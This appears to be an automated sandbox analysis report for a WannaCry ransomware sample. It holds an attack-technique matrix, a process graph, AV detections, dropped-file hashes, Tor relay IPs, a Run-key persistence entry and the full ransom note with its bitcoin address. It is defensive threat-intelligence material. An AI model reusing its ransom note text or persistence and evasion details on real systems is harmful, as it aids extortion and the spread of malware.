                  DLL Side-Loading                  		12
                  Scripting                  		OS Credential Dumping1
                  System Time Discovery                  		Remote Services12
                  Archive Collected Data                  		Exfiltration Over Other Network Medium1
                  Ingress Tool Transfer                  		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization21
                  Data Encrypted for Impact
                  Default Accounts21
                  Native API                  		1
                  Registry Run Keys / Startup Folder                  		1
                  Access Token Manipulation                  		1
                  Obfuscated Files or Information                  		LSASS Memory1
                  Account Discovery                  		Remote Desktop Protocol11
                  Clipboard Data                  		Exfiltration Over Bluetooth22
                  Encrypted Channel                  		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without Authorization1
                  Inhibit System Recovery
                  Domain Accounts2
                  Command and Scripting Interpreter                  		1
                  Services File Permissions Weakness                  		11
                  Process Injection                  		1
                  DLL Side-Loading                  		Security Account Manager3
                  File and Directory Discovery                  		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration2
                  Multi-hop Proxy                  		Exploit SS7 to Track Device LocationObtain Device Cloud Backups1
                  Defacement
                  Local AccountsAt (Windows)Logon Script (Mac)1
                  Registry Run Keys / Startup Folder                  		1
                  File Deletion                  		NTDS23
                  System Information Discovery                  		Distributed Component Object ModelInput CaptureScheduled Transfer1
                  Application Layer Protocol                  		SIM Card SwapCarrier Billing Fraud
                  Cloud AccountsCronNetwork Logon Script1
                  Services File Permissions Weakness                  		111
                  Masquerading                  		LSA Secrets21
                  Security Software Discovery                  		SSHKeyloggingData Transfer Size Limits2
                  Proxy                  		Manipulate Device CommunicationManipulate App Store Rankings or Ratings
                  Replication Through Removable MediaLaunchdRc.commonRc.common1
                  Virtualization/Sandbox Evasion                  		Cached Domain Credentials1
                  Virtualization/Sandbox Evasion                  		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                  External Remote ServicesScheduled TaskStartup ItemsStartup Items1
                  Modify Registry                  		DCSync1
                  Process Discovery                  		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                  Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
                  Access Token Manipulation                  		Proc Filesystem1
                  Application Window Discovery                  		Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                  Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)11
                  Process Injection                  		/etc/passwd and /etc/shadow1
                  System Owner/User Discovery                  		Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                  Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)1
                  Hidden Files and Directories                  		Network SniffingProcess DiscoveryTaint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
                  Compromise Software Dependencies and Development ToolsWindows Command ShellCronCron1
                  Services File Permissions Weakness                  		Input CapturePermission Groups DiscoveryReplication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 signatures2 2 Behavior Graph ID: 866427 Sample: WannaCry.cmd Startdate: 15/05/2023 Architecture: WINDOWS Score: 100 97 Malicious sample detected (through community Yara rule) 2->97 99 Antivirus detection for dropped file 2->99 101 Multi AV Scanner detection for dropped file 2->101 103 8 other signatures 2->103 10 cmd.exe 2 2->10         started        process3 file4 77 C:\Users\user\Desktop\WANNACRY.bin, PEM 10->77 dropped 119 Opens the same file many times (likely Sandbox evasion) 10->119 14 WannaCrypt0r.sk 501 10->14         started        18 certutil.exe 3 2 10->18         started        20 conhost.exe 10->20         started        22 msg.exe 1 10->22         started        signatures5 process6 file7 79 C:\Users\user\Downloads\@WanaDecryptor@.exe, PE32 14->79 dropped 81 C:\Users\user\Documents\SQSJKEBWDT.png, COM 14->81 dropped 83 C:\Users\user\Documents\PWCCAWLGRE.pdf, COM 14->83 dropped 87 228 other malicious files 14->87 dropped 125 Multi AV Scanner detection for dropped file 14->125 127 Creates files in the recycle bin to hide itself 14->127 129 Drops PE files to the document folder of the user 14->129 133 2 other signatures 14->133 24 @WanaDecryptor@.exe 14 14->24         started        29 cmd.exe 2 14->29         started        31 cmd.exe 1 14->31         started        33 23 other processes 14->33 85 C:\Users\user\Desktop\WannaCrypt0r.sk, PE32 18->85 dropped 131 Writes many files with high entropy 18->131 signatures8 process9 dnsIp10 95 127.0.0.1 unknown unknown 24->95 67 C:\Users\user\Desktop\TaskData\...\zlib1.dll, PE32 24->67 dropped 69 C:\Users\user\Desktop\TaskData\Tor\tor.exe, PE32 24->69 dropped 71 C:\Users\user\Desktop\...\taskhsvc.exe, PE32 24->71 dropped 75 7 other malicious files 24->75 dropped 105 Detected Wannacry Ransomware 24->105 107 Multi AV Scanner detection for dropped file 24->107 109 Installs TOR (Internet Anonymizer) 24->109 115 4 other signatures 24->115 35 taskhsvc.exe 9 24->35         started        73 C:\Users\user\Desktop\m.vbs, ASCII 29->73 dropped 111 Command shell drops VBS files 29->111 113 Deletes shadow drive data (may be related to ransomware) 29->113 38 cscript.exe 3 29->38         started        41 conhost.exe 29->41         started        43 @WanaDecryptor@.exe 31->43         started        46 conhost.exe 31->46         started        48 conhost.exe 33->48         started        50 conhost.exe 33->50         started        52 conhost.exe 33->52         started        54 reg.exe 33->54         started        file11 signatures12 process13 dnsIp14 89 163.172.53.201, 443, 49840, 49865 OnlineSASFR United Kingdom 35->89 91 5.9.158.75, 443, 49836, 49838 HETZNER-ASDE Germany 35->91 93 171.25.193.9, 49837, 80 DFRI-ASForeningenfordigitalafri-ochrattigheterSE Sweden 35->93 56 conhost.exe 35->56         started        65 C:\Users\user\...\@WanaDecryptor@.exe.lnk, MS 38->65 dropped 121 Deletes shadow drive data (may be related to ransomware) 43->121 123 Uses bcdedit to modify the Windows boot settings 43->123 58 cmd.exe 1 43->58         started        file15 signatures16 process17 signatures18 117 Deletes shadow drive data (may be related to ransomware) 58->117 61 WMIC.exe 1 58->61         started        63 conhost.exe 58->63         started        process19

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  WannaCry.cmd25%VirustotalBrowse
                  WannaCry.cmd11%ReversingLabsWin32.Trojan.Generic

                  Dropped Files

                  SourceDetectionScannerLabelLink
                  C:\@WanaDecryptor@.exe100%AviraLNK/Runner.VPDJ
                  C:\@WanaDecryptor@.exe100%AviraLNK/Runner.VPDJ
                  C:\@WanaDecryptor@.exe100%AviraLNK/Runner.VPDJ
                  C:\@WanaDecryptor@.exe100%AviraLNK/Runner.VPDJ
                  C:\@WanaDecryptor@.exe100%AviraLNK/Runner.VPDJ
                  C:\@WanaDecryptor@.exe100%AviraLNK/Runner.VPDJ
                  C:\@WanaDecryptor@.exe100%AviraLNK/Runner.VPDJ
                  C:\ProgramData\Intel\GCC\@WanaDecryptor@.exe.lnk100%AviraLNK/Runner.VPDJ
                  C:\@WanaDecryptor@.exe100%AviraTR/FileCoder.724645
                  C:\@WanaDecryptor@.exe100%AviraLNK/Runner.VPDJ
                  C:\@WanaDecryptor@.exe100%Joe Sandbox ML
                  C:\@WanaDecryptor@.exe96%ReversingLabsWin32.Ransomware.WannaCry
                  C:\Users\user\AppData\Local\@WanaDecryptor@.exe96%ReversingLabsWin32.Ransomware.WannaCry
                  C:\Users\user\Desktop\@WanaDecryptor@.exe96%ReversingLabsWin32.Ransomware.WannaCry
                  C:\Users\user\Desktop\TaskData\Tor\libeay32.dll0%ReversingLabs
                  C:\Users\user\Desktop\TaskData\Tor\libevent-2-0-5.dll0%ReversingLabs
                  C:\Users\user\Desktop\TaskData\Tor\libevent_core-2-0-5.dll0%ReversingLabs
                  C:\Users\user\Desktop\TaskData\Tor\libevent_extra-2-0-5.dll0%ReversingLabs
                  C:\Users\user\Desktop\TaskData\Tor\libgcc_s_sjlj-1.dll0%ReversingLabs
                  C:\Users\user\Desktop\TaskData\Tor\libssp-0.dll0%ReversingLabs
                  C:\Users\user\Desktop\TaskData\Tor\ssleay32.dll0%ReversingLabs
                  C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exe0%ReversingLabs
                  C:\Users\user\Desktop\TaskData\Tor\tor.exe0%ReversingLabs
                  C:\Users\user\Desktop\TaskData\Tor\zlib1.dll0%ReversingLabs
                  C:\Users\user\Desktop\WannaCrypt0r.sk94%ReversingLabsWin32.Ransomware.WannaCry
                  C:\Users\user\Desktop\taskdl.exe89%ReversingLabsWin32.Ransomware.WannaCry
                  C:\Users\user\Desktop\taskse.exe89%ReversingLabsWin32.Ransomware.WannaCry
                  C:\Users\user\Desktop\u.wnry96%ReversingLabsWin32.Ransomware.WannaCry
                  C:\Users\user\Documents\@WanaDecryptor@.exe96%ReversingLabsWin32.Ransomware.WannaCry
                  C:\Users\user\Downloads\@WanaDecryptor@.exe96%ReversingLabsWin32.Ransomware.WannaCry
                  C:\Users\Default\Desktop\@WanaDecryptor@.exe96%ReversingLabsWin32.Ransomware.WannaCry
                  C:\Users\Public\Desktop\@WanaDecryptor@.exe96%ReversingLabsWin32.Ransomware.WannaCry

                  Unpacked PE Files

                  No Antivirus matches

                  Domains

                  No Antivirus matches

                  URLs

                  SourceDetectionScannerLabelLink
                  http://www.btcfrog.com/qr/bitcoinPNG.php?address=%smailto:%shttps://www.google.com/search?q=how0%Avira URL Cloudsafe
                  http://freehaven.net/anonbib/#hs-attack060%Avira URL Cloudsafe
                  https://386bsd.net0%Avira URL Cloudsafe
                  http://www.btcfrog.com/qr/bitcoinPNG.php?address=%s0%Avira URL Cloudsafe
                  http://www.btcfrog.com/qr/bitcoinPNG.php?address=%smailto:%shttps://www.google.com/search?q=how0%VirustotalBrowse
                  https://386bsd.net0%VirustotalBrowse
                  http://freehaven.net/anonbib/#hs-attack060%VirustotalBrowse
                  http://www.btcfrog.com/qr/bitcoinPNG.php?address=%s0%VirustotalBrowse

                  Domains and IPs

                  Contacted Domains

                  No contacted domains info

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  http://www.btcfrog.com/qr/bitcoinPNG.php?address=%s@WanaDecryptor@.exetrue
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  https://wiki.torproject.org/TheOnionRouter/TorFAQ#SOCKSAndDNS.%staskhsvc.exe, 0000001D.00000000.4371285563.000000000081C000.00000002.00000001.01000000.0000000A.sdmpfalse
                    		high
                    https://blog.torproject.org/blog/lifecycle-of-a-new-relayError@WanaDecryptor@.exe, 00000019.00000003.4365502561.000000000289A000.00000004.00000020.00020000.00000000.sdmp, taskhsvc.exe, 0000001D.00000000.4371285563.000000000081C000.00000002.00000001.01000000.0000000A.sdmpfalse
                      		high
                      https://www.google.com/search?q=how@WanaDecryptor@.exefalse
                        		high
                        https://www.torproject.org/download/download#warningalphabetaThistaskhsvc.exe, 0000001D.00000000.4371285563.000000000081C000.00000002.00000001.01000000.0000000A.sdmpfalse
                          		high
                          http://www.btcfrog.com/qr/bitcoinPNG.php?address=%smailto:%shttps://www.google.com/search?q=howWannaCrypt0r.sk, 00000005.00000003.4342275921.00000000008AC000.00000004.00000020.00020000.00000000.sdmp, WannaCrypt0r.sk, 00000005.00000003.3016294775.0000000000870000.00000004.00000020.00020000.00000000.sdmp, WannaCrypt0r.sk, 00000005.00000003.3030888426.0000000000876000.00000004.00000020.00020000.00000000.sdmp, WannaCrypt0r.sk, 00000005.00000003.3370890950.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, WannaCrypt0r.sk, 00000005.00000003.3037184208.000000000087B000.00000004.00000020.00020000.00000000.sdmp, @WanaDecryptor@.exe, 00000019.00000000.4343624168.000000000041F000.00000008.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 0000001C.00000002.4450693015.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 0000001C.00000000.4347439754.000000000041F000.00000008.00000001.01000000.00000009.sdmptrue
                          • 0%, Virustotal, Browse
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.zlib.net/D@WanaDecryptor@.exe, 00000019.00000003.4365094465.0000000002791000.00000004.00000020.00020000.00000000.sdmp, @WanaDecryptor@.exe, 00000019.00000003.4365358395.0000000002798000.00000004.00000020.00020000.00000000.sdmpfalse
                            		high
                            https://wiki.torproject.org/TheOnionRouter/TorFAQ#SOCKSAndDNS.%sDANGEROUS_SOCKStaskhsvc.exe, 0000001D.00000000.4371285563.000000000081C000.00000002.00000001.01000000.0000000A.sdmpfalse
                              		high
                              https://www.torproject.org/documentation.htmltaskhsvc.exe, 0000001D.00000000.4371285563.000000000081C000.00000002.00000001.01000000.0000000A.sdmpfalse
                                		high
                                https://386bsd.nettaskhsvc.exe, 0000001D.00000003.4413396862.0000000003710000.00000004.00000020.00020000.00000000.sdmpfalse
                                • 0%, Virustotal, Browse
                                • Avira URL Cloud: safe
                                		unknown
                                https://www.torproject.org/download/download#warningtaskhsvc.exe, 0000001D.00000000.4371285563.000000000081C000.00000002.00000001.01000000.0000000A.sdmpfalse
                                  		high
                                  https://dist.torproject.org/torbrowser/6.5.1/tor-win32-0.2.9.10.zip$@WanaDecryptor@.exe, 00000019.00000002.7374394237.0000000000198000.00000004.00000010.00020000.00000000.sdmp, @WanaDecryptor@.exe, 0000001C.00000002.4450175484.000000000019B000.00000004.00000010.00020000.00000000.sdmpfalse
                                    		high
                                    https://www.torproject.org/taskhsvc.exe, 0000001D.00000000.4371285563.000000000081C000.00000002.00000001.01000000.0000000A.sdmpfalse
                                      		high
                                      https://trac.torproject.org/8742taskhsvc.exe, 0000001D.00000000.4371285563.000000000081C000.00000002.00000001.01000000.0000000A.sdmpfalse
                                        		high
                                        http://freehaven.net/anonbib/#hs-attack06taskhsvc.exe, 0000001D.00000000.4371285563.000000000081C000.00000002.00000001.01000000.0000000A.sdmpfalse
                                        • 0%, Virustotal, Browse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://www.torproject.org/docs/faq.html#BestOSForRelaytaskhsvc.exe, 0000001D.00000000.4371285563.000000000081C000.00000002.00000001.01000000.0000000A.sdmpfalse
                                          		high
                                          https://dist.torproject.org/torbrowser/6.5.1/tor-win32-0.2.9.10.zip@WanaDecryptor@.exefalse
                                            		high
                                            https://blog.torproject.org/blog/lifecycle-of-a-new-relay@WanaDecryptor@.exe, 00000019.00000003.4365502561.000000000289A000.00000004.00000020.00020000.00000000.sdmp, taskhsvc.exe, 0000001D.00000000.4371285563.000000000081C000.00000002.00000001.01000000.0000000A.sdmpfalse
                                              		high
                                              https://dist.torproject.org/torbrowser/6.5.1/tor-win32-0.2.9.10.zip8B@WanaDecryptor@.exe, 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmpfalse
                                                		high
                                                https://trac.torproject.org/projects/tor/ticket/14917.taskhsvc.exe, 0000001D.00000000.4371285563.000000000081C000.00000002.00000001.01000000.0000000A.sdmpfalse
                                                  		high

                                                  World Map of Contacted IPs

                                                  • No. of IPs < 25%
                                                  • 25% < No. of IPs < 50%
                                                  • 50% < No. of IPs < 75%
                                                  • 75% < No. of IPs

                                                  Public IPs

                                                  IPDomainCountryFlagASNASN NameMalicious
                                                  171.25.193.9
                                                  		unknownSweden
                                                  		198093DFRI-ASForeningenfordigitalafri-ochrattigheterSEfalse
                                                  163.172.53.201
                                                  		unknownUnited Kingdom
                                                  		12876OnlineSASFRfalse
                                                  5.9.158.75
                                                  		unknownGermany
                                                  		24940HETZNER-ASDEfalse

                                                  Private

                                                  IP
                                                  127.0.0.1

                                                  General Information

                                                  Joe Sandbox Version:37.1.0 Beryl
                                                  Analysis ID:866427
                                                  Start date and time:2023-05-15 09:25:54 +02:00
                                                  Joe Sandbox Product:CloudBasic
                                                  Overall analysis duration:0h 22m 41s
                                                  Hypervisor based Inspection enabled:false
                                                  Report type:full
                                                  Cookbook file name:default.jbs
                                                  Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, IE 11, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                                                  Number of analysed new started processes analysed:53
                                                  Number of new started drivers analysed:0
                                                  Number of existing processes analysed:0
                                                  Number of existing drivers analysed:0
                                                  Number of injected processes analysed:0
                                                  Technologies:
                                                  • HCA enabled
                                                  • EGA enabled
                                                  • HDC enabled
                                                  • AMSI enabled
                                                  Analysis Mode:default
                                                  Analysis stop reason:Timeout
                                                  Sample file name:WannaCry.cmd
                                                  Detection:MAL
                                                  Classification:mal100.rans.spyw.evad.winCMD@51/842@0/4
                                                  EGA Information:
                                                  • Successful, ratio: 100%
                                                  HDC Information:
                                                  • Successful, ratio: 99.9% (good quality ratio 74.3%)
                                                  • Quality average: 59.8%
                                                  • Quality standard deviation: 38.8%
                                                  HCA Information:
                                                  • Successful, ratio: 100%
                                                  • Number of executed functions: 87
                                                  • Number of non-executed functions: 251
                                                  Cookbook Comments:
                                                  • Found application associated with file extension: .cmd
                                                  • Sleeps bigger than 100000000ms are automatically reduced to 1000ms

                                                  Warnings

                                                  • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
                                                  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, MoUsoCoreWorker.exe, VSSVC.exe, UsoClient.exe
                                                  • Excluded IPs from analysis (whitelisted): 40.126.32.140, 20.190.160.14, 20.190.160.17, 40.126.32.138, 40.126.32.72, 20.190.160.22, 20.190.160.20, 40.126.32.76, 209.197.3.8, 20.93.58.141, 20.82.207.122
                                                  • Excluded domains from analysis (whitelisted): wd-prod-cp-eu-north-3-fe.northeurope.cloudapp.azure.com, spclient.wg.spotify.com, client.wns.windows.com, slscr.update.microsoft.com, wd-prod-cp-eu-north-2-fe.northeurope.cloudapp.azure.com, ctldl.windowsupdate.com, cds.d2s7q6s2.hwcdn.net, wdcp.microsoft.com, wu-bg-shim.trafficmanager.net, wd-prod-cp.trafficmanager.net, login.msa.msidentity.com, www.tm.a.prd.aadg.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, wdcpalt.microsoft.com, prda.aadg.msidentity.com, login.live.com, www.tm.lg.prod.aadmsa.trafficmanager.net
                                                  • Not all processes where analyzed, report is missing behavior information
                                                  • Report creation exceeded maximum time and may have missing behavior information.
                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                  • Report size getting too big, too many NtCreateFile calls found.
                                                  • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                  • Report size getting too big, too many NtOpenFile calls found.
                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                  • Report size getting too big, too many NtSetInformationFile calls found.

                                                  Simulations

                                                  Behavior and APIs

                                                  TimeTypeDescription
                                                  09:31:35AutostartRun: HKLM\Software\Microsoft\Windows\CurrentVersion\Run vfwrglgamdagtoq456 "C:\Users\user\Desktop\tasksche.exe"

                                                  Joe Sandbox View / Context

                                                  IPs

                                                  No context

                                                  Domains

                                                  No context

                                                  ASNs

                                                  No context

                                                  JA3 Fingerprints

                                                  No context

                                                  Dropped Files

                                                  No context

                                                  Created / dropped Files

                                                  C:\@Please_Read_Me@.txt

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):933
                                                  Entropy (8bit):4.708686542546707
                                                  Encrypted:false
                                                  SSDEEP:24:ptrPzDVR5Gi3OzGm0EigS1xbnrRQhbrW8PNAi0eEprY+Ai75wRZcet:DZD36W3yhvWmMo+S
                                                  MD5:F97D2E6F8D820DBD3B66F21137DE4F09
                                                  SHA1:596799B75B5D60AA9CD45646F68E9C0BD06DF252
                                                  SHA-256:0E5ECE918132A2B1A190906E74BECB8E4CED36EEC9F9D1C70F5DA72AC4C6B92A
                                                  SHA-512:EFDA21D83464A6A32FDEEF93152FFD32A648130754FDD3635F7FF61CC1664F7FC050900F0F871B0DDD3A3846222BF62AB5DF8EED42610A76BE66FFF5F7B4C4C0
                                                  Malicious:false
                                                  Yara Hits:
                                                  • Rule: WannaCry_RansomNote, Description: Detects WannaCry Ransomware Note, Source: C:\@Please_Read_Me@.txt, Author: Florian Roth (Nextron Systems)
                                                  • Rule: WannaCry_RansomNote, Description: Detects WannaCry Ransomware Note, Source: C:\@Please_Read_Me@.txt, Author: Florian Roth (Nextron Systems)
                                                  • Rule: WannaCry_RansomNote, Description: Detects WannaCry Ransomware Note, Source: C:\@Please_Read_Me@.txt, Author: Florian Roth (Nextron Systems)
                                                  • Rule: WannaCry_RansomNote, Description: Detects WannaCry Ransomware Note, Source: C:\@Please_Read_Me@.txt, Author: Florian Roth (Nextron Systems)
                                                  • Rule: WannaCry_RansomNote, Description: Detects WannaCry Ransomware Note, Source: C:\@Please_Read_Me@.txt, Author: Florian Roth (Nextron Systems)
                                                  • Rule: WannaCry_RansomNote, Description: Detects WannaCry Ransomware Note, Source: C:\@Please_Read_Me@.txt, Author: Florian Roth (Nextron Systems)
                                                  • Rule: WannaCry_RansomNote, Description: Detects WannaCry Ransomware Note, Source: C:\@Please_Read_Me@.txt, Author: Florian Roth (Nextron Systems)
                                                  • Rule: WannaCry_RansomNote, Description: Detects WannaCry Ransomware Note, Source: C:\@Please_Read_Me@.txt, Author: Florian Roth (Nextron Systems)
                                                  • Rule: WannaCry_RansomNote, Description: Detects WannaCry Ransomware Note, Source: C:\@Please_Read_Me@.txt, Author: Florian Roth (Nextron Systems)
                                                  • Rule: WannaCry_RansomNote, Description: Detects WannaCry Ransomware Note, Source: C:\@Please_Read_Me@.txt, Author: Florian Roth (Nextron Systems)
                                                  • Rule: WannaCry_RansomNote, Description: Detects WannaCry Ransomware Note, Source: C:\@Please_Read_Me@.txt, Author: Florian Roth (Nextron Systems)
                                                  • Rule: WannaCry_RansomNote, Description: Detects WannaCry Ransomware Note, Source: C:\@Please_Read_Me@.txt, Author: Florian Roth (Nextron Systems)
                                                  • Rule: WannaCry_RansomNote, Description: Detects WannaCry Ransomware Note, Source: C:\@Please_Read_Me@.txt, Author: Florian Roth (Nextron Systems)
                                                  • Rule: WannaCry_RansomNote, Description: Detects WannaCry Ransomware Note, Source: C:\@Please_Read_Me@.txt, Author: Florian Roth (Nextron Systems)
                                                  • Rule: WannaCry_RansomNote, Description: Detects WannaCry Ransomware Note, Source: C:\@Please_Read_Me@.txt, Author: Florian Roth (Nextron Systems)
                                                  • Rule: WannaCry_RansomNote, Description: Detects WannaCry Ransomware Note, Source: C:\@Please_Read_Me@.txt, Author: Florian Roth (Nextron Systems)
                                                  • Rule: WannaCry_RansomNote, Description: Detects WannaCry Ransomware Note, Source: C:\@Please_Read_Me@.txt, Author: Florian Roth (Nextron Systems)
                                                  • Rule: WannaCry_RansomNote, Description: Detects WannaCry Ransomware Note, Source: C:\@Please_Read_Me@.txt, Author: Florian Roth (Nextron Systems)
                                                  • Rule: WannaCry_RansomNote, Description: Detects WannaCry Ransomware Note, Source: C:\@Please_Read_Me@.txt, Author: Florian Roth (Nextron Systems)
                                                  • Rule: WannaCry_RansomNote, Description: Detects WannaCry Ransomware Note, Source: C:\@Please_Read_Me@.txt, Author: Florian Roth (Nextron Systems)
                                                  • Rule: WannaCry_RansomNote, Description: Detects WannaCry Ransomware Note, Source: C:\@Please_Read_Me@.txt, Author: Florian Roth (Nextron Systems)
                                                  • Rule: WannaCry_RansomNote, Description: Detects WannaCry Ransomware Note, Source: C:\@Please_Read_Me@.txt, Author: Florian Roth (Nextron Systems)
                                                  • Rule: WannaCry_RansomNote, Description: Detects WannaCry Ransomware Note, Source: C:\@Please_Read_Me@.txt, Author: Florian Roth (Nextron Systems)
                                                  • Rule: WannaCry_RansomNote, Description: Detects WannaCry Ransomware Note, Source: C:\@Please_Read_Me@.txt, Author: Florian Roth (Nextron Systems)
                                                  • Rule: WannaCry_RansomNote, Description: Detects WannaCry Ransomware Note, Source: C:\@Please_Read_Me@.txt, Author: Florian Roth (Nextron Systems)
                                                  • Rule: WannaCry_RansomNote, Description: Detects WannaCry Ransomware Note, Source: C:\@Please_Read_Me@.txt, Author: Florian Roth (Nextron Systems)
                                                  • Rule: WannaCry_RansomNote, Description: Detects WannaCry Ransomware Note, Source: C:\@Please_Read_Me@.txt, Author: Florian Roth (Nextron Systems)
                                                  Reputation:unknown
                                                  Preview:Q: What's wrong with my files?....A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted... If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely!.. Let's start decrypting!....Q: What do I do?....A: First, you need to pay service fees for the decryption... Please send $300 worth of bitcoin to this bitcoin address: 115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn.... Next, please find an application file named "@WanaDecryptor@.exe". It is the decrypt software... Run and follow the instructions! (You may need to disable your antivirus for a while.).. ..Q: How can I trust?....A: Don't worry about decryption... We will decrypt your files surely because nobody will trust us if we cheat users... ....* If you need our assistance, send a message by clicking <Contact Us> on the decryptor window....

                                                  C:\@WanaDecryptor@.exe

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):245760
                                                  Entropy (8bit):6.278920408390635
                                                  Encrypted:false
                                                  SSDEEP:3072:Rmrhd5U1eigWcR+uiUg6p4FLlG4tlL8z+mmCeHFZjoHEo3m:REd5+IZiZhLlG4AimmCo
                                                  MD5:7BF2B57F2A205768755C07F238FB32CC
                                                  SHA1:45356A9DD616ED7161A3B9192E2F318D0AB5AD10
                                                  SHA-256:B9C5D4339809E0AD9A00D4D3DD26FDF44A32819A54ABF846BB9B560D81391C25
                                                  SHA-512:91A39E919296CB5C6ECCBA710B780519D90035175AA460EC6DBE631324E5E5753BD8D87F395B5481BCD7E1AD623B31A34382D81FAAE06BEF60EC28B49C3122A9
                                                  Malicious:true
                                                  Yara Hits:
                                                  • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: C:\@WanaDecryptor@.exe, Author: Joe Security
                                                  • Rule: Win32_Ransomware_WannaCry, Description: unknown, Source: C:\@WanaDecryptor@.exe, Author: ReversingLabs
                                                  • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: C:\@WanaDecryptor@.exe, Author: Joe Security
                                                  • Rule: Win32_Ransomware_WannaCry, Description: unknown, Source: C:\@WanaDecryptor@.exe, Author: ReversingLabs
                                                  • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: C:\@WanaDecryptor@.exe, Author: Joe Security
                                                  • Rule: Win32_Ransomware_WannaCry, Description: unknown, Source: C:\@WanaDecryptor@.exe, Author: ReversingLabs
                                                  • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: C:\@WanaDecryptor@.exe, Author: Joe Security
                                                  • Rule: Win32_Ransomware_WannaCry, Description: unknown, Source: C:\@WanaDecryptor@.exe, Author: ReversingLabs
                                                  • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: C:\@WanaDecryptor@.exe, Author: Joe Security
                                                  • Rule: Win32_Ransomware_WannaCry, Description: unknown, Source: C:\@WanaDecryptor@.exe, Author: ReversingLabs
                                                  • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: C:\@WanaDecryptor@.exe, Author: Joe Security
                                                  • Rule: Win32_Ransomware_WannaCry, Description: unknown, Source: C:\@WanaDecryptor@.exe, Author: ReversingLabs
                                                  • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: C:\@WanaDecryptor@.exe, Author: Joe Security
                                                  • Rule: Win32_Ransomware_WannaCry, Description: unknown, Source: C:\@WanaDecryptor@.exe, Author: ReversingLabs
                                                  Antivirus:
                                                  • Antivirus: Avira, Detection: 100%
                                                  • Antivirus: Avira, Detection: 100%
                                                  • Antivirus: Avira, Detection: 100%
                                                  • Antivirus: Avira, Detection: 100%
                                                  • Antivirus: Avira, Detection: 100%
                                                  • Antivirus: Avira, Detection: 100%
                                                  • Antivirus: Avira, Detection: 100%
                                                  • Antivirus: Avira, Detection: 100%
                                                  • Antivirus: Avira, Detection: 100%
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  • Antivirus: ReversingLabs, Detection: 96%
                                                  Reputation:unknown
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......%...a...a...a......b.......u.......`.....d.......j.......e...W...b...a.......W...s.......`...Richa...................PE..L.....[J.................@...p.......1.......P....@..................................................................................0..|............................................................................P...............................text....3.......@.................. ..`.rdata..h....P.......P..............@..@.data....2.......0..................@....rsrc...|....0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................

